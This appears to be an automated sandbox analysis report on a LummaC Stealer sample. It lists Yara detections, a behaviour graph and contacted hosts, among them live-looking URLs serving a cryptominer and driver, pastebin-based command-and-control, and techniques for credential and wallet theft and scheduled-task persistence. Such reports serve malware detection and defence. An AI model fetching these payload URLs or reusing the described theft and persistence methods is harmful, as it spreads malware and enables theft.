Source: Yara match File source: 00000002.00000003.1109274613.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1081894496.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1108659728.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1082401555.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: setupx 1.exe1.exe PID: 6848, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: setupx 1.exe1.exe PID: 6848, type: MEMORYSTR
Source: Yara match File source: 2.2.setupx 1.exe1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.setupx 1.exe1.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.2253160823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1082664009.0000000002D39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1637273 Sample: setupx 1.exe1.exe Startdate: 13/03/2025 Architecture: WINDOWS Score: 100 60 pastebin.com 2->60 62 citydisco.bet 2->62 78 Found malware configuration 2->78 80 Antivirus detection for URL or domain 2->80 82 Antivirus / Scanner detection for submitted sample 2->82 86 11 other signatures 2->86 11 setupx 1.exe1.exe 1 2->11         started        signatures3 84 Connects to a pastebin service (likely for C&C) 60->84 process4 signatures5 94 Injects a PE file into a foreign processes 11->94 14 setupx 1.exe1.exe 1 11->14         started        19 WerFault.exe 19 16 11->19         started        21 conhost.exe 11->21         started        process6 dnsIp7 66 185.215.113.51, 49695, 49701, 49702 WHOLESALECONNECTIONSNL Portugal 14->66 68 citydisco.bet 188.114.97.3, 443, 49682, 49684 CLOUDFLARENETUS European Union 14->68 58 C:\Users\user\...\ZHKYZWVTC38PGAWGZF49K.exe, PE32 14->58 dropped 70 Query firmware table information (likely to detect VMs) 14->70 72 Found many strings related to Crypto-Wallets (likely being stolen) 14->72 74 Tries to harvest and steal ftp login credentials 14->74 76 2 other signatures 14->76 23 ZHKYZWVTC38PGAWGZF49K.exe 15 31 14->23         started        file8 signatures9 process10 dnsIp11 64 pastebin.com 172.67.19.24, 443, 49699 CLOUDFLARENETUS United States 23->64 54 C:\ProgramData\Dllhost\WinRing0x64.sys, PE32+ 23->54 dropped 56 C:\ProgramData\Dllhost\winlogson.exe, PE32+ 23->56 dropped 90 Multi AV Scanner detection for dropped file 23->90 92 Sample is not signed and drops a device driver 23->92 28 cmd.exe 1 23->28         started        31 cmd.exe 23->31         started        33 cmd.exe 23->33         started        file12 signatures13 process14 signatures15 96 Encrypted powershell cmdline option found 28->96 98 Uses schtasks.exe or at.exe to add and modify task schedules 28->98 100 Uses powercfg.exe to modify the power settings 28->100 102 Modifies power options to not sleep / hibernate 28->102 35 powershell.exe 23 28->35         started        38 conhost.exe 28->38         started        40 powercfg.exe 1 28->40         started        50 4 other processes 28->50 42 conhost.exe 31->42         started        44 schtasks.exe 31->44         started        46 conhost.exe 33->46         started        48 schtasks.exe 33->48         started        process16 signatures17 88 Loading BitLocker PowerShell Module 35->88 52 WmiPrvSE.exe 35->52         started        process18
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
188.114.97.3
 citydisco.bet European Union
13335 CLOUDFLARENETUS false
172.67.19.24
 pastebin.com United States
13335 CLOUDFLARENETUS false
185.215.113.51
 unknown Portugal
206894 WHOLESALECONNECTIONSNL false

Contacted Domains

Name IP Active
citydisco.bet 188.114.97.3 true
pastebin.com 172.67.19.24 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
bugildbett.top/bAuz false
    		high
    citydisco.bet/gdJIS false
      		high
      http://185.215.113.51/WinRing0x64.sys false
        		high
        https://pastebin.com/raw/YpJeSRBC false
          		high
          cjlaspcorne.icu/DbIps false
            		high
            mrodularmall.top/aNzS false
              		high
              jowinjoinery.icu/bdWUa false
                		high
                legenassedk.top/bdpWO false
                  		high
                  http://185.215.113.51/xmrig.exe false
                    		high
                    featureccus.shop/bdMAn false
                      		high
                      htardwarehu.icu/Sbdsa false
                        		high
                        https://citydisco.bet/gdJIS false
                          		high